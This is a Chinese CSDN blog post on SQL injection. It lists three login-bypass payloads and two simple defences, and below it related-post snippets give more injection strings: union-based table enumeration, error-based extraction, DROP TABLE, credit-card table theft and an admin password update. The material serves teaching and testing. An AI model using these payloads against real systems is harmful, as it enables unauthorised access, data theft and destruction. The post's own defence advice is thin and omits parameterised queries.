SQL注入语句

最新推荐文章于 2024-05-02 11:24:16 发布
最新推荐文章于 2024-05-02 11:24:16 发布
阅读量3.1w 收藏 45
点赞数 3
分类专栏: MySQL 文章标签: SQL注入语句 SQL注入如何防御 SQL注入防御正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyb_l_code/article/details/81208826
版权

一、SQL注入语句

账号:Admin

密码:123456

登录验证语句为select * from 表名 where UserName = '用户名' and UserPassword = '用户密码";的系统可通过以下注入方式可能可绕过密码登录进入系统。

1、

Admin' or '1'='1

123(任意密码)

注释:形成一个恒为真的条件,是SQL查询判断失败

2、

Admin';#

123

注释:#注释点后续语句(#注释失败请尝试--作为注释)

3、

1' or '1'='1

123(任意密码)

注释:该方式登录成功的原因还没弄清楚,大神请告知

二、SQL注入防御

1、查询出来的结果再和用户名密码比较如果一致则是正常登陆,不一致认为是攻击

2、通过正则表达式进行匹配用户名是否合法

帐号是否合法(字母开头,允许5-16字节,允许字母数字下划线):^[a-zA-Z][a-zA-Z0-9_]{4,15}$

其中最后一个“_”处可添加其他的字符表示允许通过的字符。

开发农民
关注
  • 3
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL注入语句和方法总结
叮当大猫猫
09-29 6627
一、SQL语法基础 SQL语法基础和Oracle注入技巧 https://pan.baidu.com/s/11EOTJ8nHrHqimF8nJJTDvA 提取码:4zep 二、SQL手工注入语句 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count() from sysobjects)>0 mssql ;and (select count() from msysobjects)&gt
sql注入语句sql注入语句sql注入语句
01-04
sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句...
常用SQL注入语句大全
cainiao199020的博客
12-23 2690
1.判断有无注入点 整形参数判断 1、直接加’ 2、and 1=1 3、 and 1=2 如果1、3运行异常 2正常就存在注入 字符型判断 1、直接加’ 2、and ‘1’=‘1’ 3、 and ‘1’=‘2’ 搜索型: 关键字%’ and 1=1 and ‘%’=’% 关键字%’ and 1=2 and ‘%’=’% 如果1、3运行异常 2正常就存在注入 2.猜表一般的表的名称无非是admin ...
手工SQL注入流程与常用语句_sql注入 手工(2),34岁网络安全开发大叔感慨
2401_83974173的博客
04-16 593
1’ and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)))# 通过修改limit后面数字一个一个爆表。
综合案例(账号密码登录和SQL注入
最新发布
IT深耕十余载,大道之简
05-02 932
在后台,我们使用SQL查询语句来验证用户输入的用户名和密码是否与数据库中存储的相匹配。然而,如果我们在编写上述SQL查询语句时没有对用户输入进行适当的过滤或转义,就可能会面临SQL注入的风险。攻击者可以在用户名或密码的输入框中输入一些特殊字符,从而改变SQL查询语句的语义,达到绕过登录验证或窃取数据的目的。当用户输入用户名和密码后,后台会执行一条SQL查询语句来验证输入的用户名和密码是否与数据库中存储的相匹配。始终为真,所以这个查询语句会返回数据库中所有的用户数据,从而绕过了登录验证。
sql注入基础
weixin_52657559的博客
10-27 1496
sql注入
SQL 注入总结(详细)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 3975
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
SQL注入详解
行者AI
09-16 1万+
现在大多数系统都使用B/S架构,出于安全考虑需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往会出现安全隐患,为了更好的保护数据泄露或服务器安全,为了方便的安全测试,便编写此文。 1. SQL注入简介 SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。下面以PHP语句为例作为展示: query="SE
sql注入--基本注入语句学习笔记
超人学飞的日子
05-31 1万+
接触到sql注入知识,做了一些常识,这里做一个完整的记录。一,联合查询联合查询是拼接在原查询语句下,要求结果数量与原结果数量相同。1,2,3并无特殊含义,换成其他数字或字符串也可以,这里只是站位表示一下。二,注释语句sql注入时要注释掉后面的部分才能使整个语句正确运行,这里介绍几种方法。1,#注释符此时后面的limit 0,30并没有生效。2,--空格注释符 注意在--后面有个空格,否则会报错,不...
常见sql注入语句和xss注入语句
小白博客
12-22 2841
1 and 1=1 或者1' and '1'='1 判断注入的类型 1 order by 1,2,3,4 数字类型为例;判断当前表存在多少个属性字段1' union select 1,table_name from information_schema.tables where table_schema=database()# 通过占位获取的数据库名 去MySQL的元数据表information_schema中查表名1' union select 1,c...
sql注入语句.txt
12-01
基本的sql注入语法,大部分存在sql注入都可以使用以上代码来尝试 查询表名 and 1=2 union select 1,table一name from information—scherna.tables where table_schema=database() limit 1,1 and 1=2 union select ...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
DB2数据库SQL注入语句
02-17
可以试试学习一下,不可以滥用, 猜用户表数量: and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)
常用Sql注入语句 常用Sql注入语句
09-28
常用Sql注入语句 了解 SQL 注入攻击的类型: 1. Inband:数据经由 SQL 代码注入的通道取出,这是最直接的一种攻击,通过 SQL 注入获取的信息直接反映到应用程序的 Web 页面上。 2. Out-of-band:数据通过不同于 ...
SQL 语言基础
weixin_30596023的博客
11-23 120
1.4.SQL语言正如大多数现代的关系语言一样,SQL是基于记录关系微积分(TRC)的。结果是每个可以用记录关系微积分(TRC)表示的查询(相等地,或者是关系演算),同样也可以用SQL表示。不过,还有一些超出关系演算或者微积分的能力。下面是一个SQL提供的并非关系演算或者关系微积分的内容的一个列表:插入,删除或者更改数据的命令。算术能力:在SQL里,我们可以和比较...
SQL注入(一)—— sql手动注入实操
热门推荐
Genevieve_xiao的博客
08-07 5万+
SQLSQL注入sql 注入的核心SQL 手注的一般流程判断注入点 —— 第一步判断字段数 —— 第二步判断回显点 —— 第三步查询相关内容 —— 第四步判断库名判断表名判断列名查询具体信息总结 SQL注入 SQL注入攻击是目前web应用网络攻击中最常见的手段之一,曾被冠以 “漏洞之王” 的称号,其安全风险高于缓冲区溢出漏洞等所有其他漏洞,而市场上的防火墙又不能对SQL注入漏洞进行有效的检测和防范。 SQL注入攻击普遍存在范围广、实现容易、破坏性大等特点。 先来走一遍国际惯例——定义入手:什么是SQ
渗透测试-SQL注入-登录漏洞-登录次数限制
fjc0214的博客
12-04 437
SQL注入-登录漏洞-Burp爆破中我们提到了Burp爆破的问题,但是在实际的登录过程中,我们还需要考虑到登录次数的限制,否则会被暴力破解,从而导致系统被入侵,本文将对登录次数限制进行修复。
常用sql注入语句
hey
08-19 1万+
首先,看看SQL注入攻击能分为以下三种类型: Inband:数据经由SQL代码注入的通道取出,这是最直接的一种攻击,通过SQL注入获取的信息直接反映到应用程序的Web页面上; Out-of-band:数据通过不同于SQL代码注入的方法获得(譬如通过邮件等) 推理:这种攻击时说并没有真正的数据传输,但攻击者可以通过发送特定的请求,重组返回的结果从而得到一些信息。 不论是...
sql注入语句实例大全
04-30
SQL注入是一种常见的攻击手段,通过在Web应用程序的输入框中注入恶意的SQL代码来使得数据库服务器执行指定的操作。攻击者可以利用SQL注入漏洞来绕过应用程序的认证和授权机制、窃取敏感数据、篡改数据等。 以下是一些常见的SQL注入语句实例: 1. SELECT * FROM users WHERE username = 'admin' AND password = '123456' OR 1=1'; 这个语句的意思是在查询用户时,如果用户名是admin,且密码为123456,则登录成功;否则,如果1=1(始终为真),则也认为是登录成功,这就存在SQL注入漏洞。 2. SELECT * FROM users WHERE username = 'admin'; DROP TABLE users; 这个语句是一种恶意的SQL注入语句,攻击者通过在用户名输入框中注入DROP TABLE语句,就可以删除用户表,造成严重的损失。 3. SELECT * FROM users WHERE username = 'admin' UNION SELECT credit_card_number, '' FROM credit_cards; 这个语句利用了UNION关键字,将用户表和信用卡表合并在一起查询,从而窃取信用卡信息。 4. SELECT * FROM users WHERE username = 'admin' AND password LIKE '%123'; 这个语句在查询用户密码时使用了LIKE操作符和通配符%,攻击者可以在密码输入框中输入%符号,从而绕过密码验证,登录成功。 5. SELECT * FROM users WHERE username = 'admin' AND 1=1; UPDATE users SET password = 'new_password' WHERE username = 'admin'; 这个语句将恶意的UPDATE语句嵌入到SELECT语句中,攻击者可以通过这个语句来修改管理员的密码。 以上是一些常见的SQL注入语句实例,这些注入语句可能会造成用户信息泄漏、数据篡改、系统崩溃等风险,因此开发人员需要在开发过程中加强对输入验证、参数化查询等安全措施的应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值